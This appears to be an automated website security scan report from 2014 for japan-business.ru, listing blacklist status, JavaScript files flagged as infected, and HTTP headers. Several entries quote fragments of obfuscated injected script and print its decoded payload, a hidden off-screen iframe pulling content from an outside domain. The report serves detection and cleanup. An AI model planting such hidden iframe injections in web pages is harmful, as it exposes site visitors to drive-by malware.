Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=japan-business.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://japan-business.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://japan-business.ru/ | 200 OK Content-Length: 16234 Content-Type: text/html | clean |
http://japan-business.ru/media/system/js/caption.js | 200 OK Content-Length: 6537 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[2846 bytes skipped]... Decoded script: <iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://japan-business.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 98768 Content-Type: application/javascript | clean |
http://japan-business.ru/media/widgetkit/js/jquery.plugins.js | 200 OK Content-Length: 13804 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[3734 bytes skipped]... Decoded script: <iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://japan-business.ru/media/widgetkit/js/responsive.js | 200 OK Content-Length: 6157 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[3010 bytes skipped]... Decoded script: <iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://japan-business.ru/media/widgetkit/widgets/accordion/js/accordion.js | 200 OK Content-Length: 6698 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[3517 bytes skipped]... Decoded script: <iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://japan-business.ru/media/widgetkit/widgets/gallery/js/lazyloader.js | 200 OK Content-Length: 5255 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[2012 bytes skipped]... Decoded script: <iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://japan-business.ru/media/widgetkit/widgets/map/js/lazyloader.js | 200 OK Content-Length: 4839 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[1590 bytes skipped]... Decoded script: <iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://japan-business.ru/media/widgetkit/widgets/slideset/js/lazyloader.js | 200 OK Content-Length: 5522 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[2296 bytes skipped]... Decoded script: <iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://japan-business.ru/media/widgetkit/widgets/slideshow/js/lazyloader.js | 200 OK Content-Length: 6731 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[3538 bytes skipped]... Decoded script: <iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://japan-business.ru/media/widgetkit/widgets/twitter/twitter.js | 200 OK Content-Length: 5604 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser', ...[2391 bytes skipped]... Decoded script: <iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://japan-business.ru/templates/japan/script.js | 200 OK Content-Length: 15706 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome/','Chrome' e = e || window.event; button = e.target || e.srcElement; wrapper = button.parentNode; if (!artHasClass(button, 'active')) wrapper.className = wrapper.className.replace(/active/, ""); }); } } } artLoadEvent.add(function() { artButtonsSetupJsHover("art-button"); }); artLoadEvent.add(function() { artButtonsSetupJsHover("button"); artButtonsSetupJsHover("readon"); }); Decoded script: <iframe src=http://shuffledog.ru/unicate.html?partner style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> Antivirus reports:
| ||
http://japan-business.ru/nasha-deyatelnost.html | 200 OK Content-Length: 17619 Content-Type: text/html | clean |
http://japan-business.ru/restorannyy-biznes.html | 200 OK Content-Length: 51786 Content-Type: text/html | clean |
http://japan-business.ru/predlozheniya-iz-yaponii/ | 200 OK Content-Length: 17032 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: japan-business.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 21 Sep 2014 04:19:58 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 16234
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 21 Sep 2014 04:19:58 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c947f98757d57d5d992c3fc7fbf4d8b9=68j6q9ffcqa1dpcniof9v7qr30; path=/
X-Powered-By: PleskLin
...16234 bytes of data.
GET / HTTP/1.1
Host: japan-business.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 21 Sep 2014 04:19:58 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 16234
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 21 Sep 2014 04:19:58 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: c947f98757d57d5d992c3fc7fbf4d8b9=68j6q9ffcqa1dpcniof9v7qr30; path=/
X-Powered-By: PleskLin
...16234 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: japan-business.ru
Referer: http://www.google.com/search?q=japan-business.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: japan-business.ru
Referer: http://www.google.com/search?q=japan-business.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.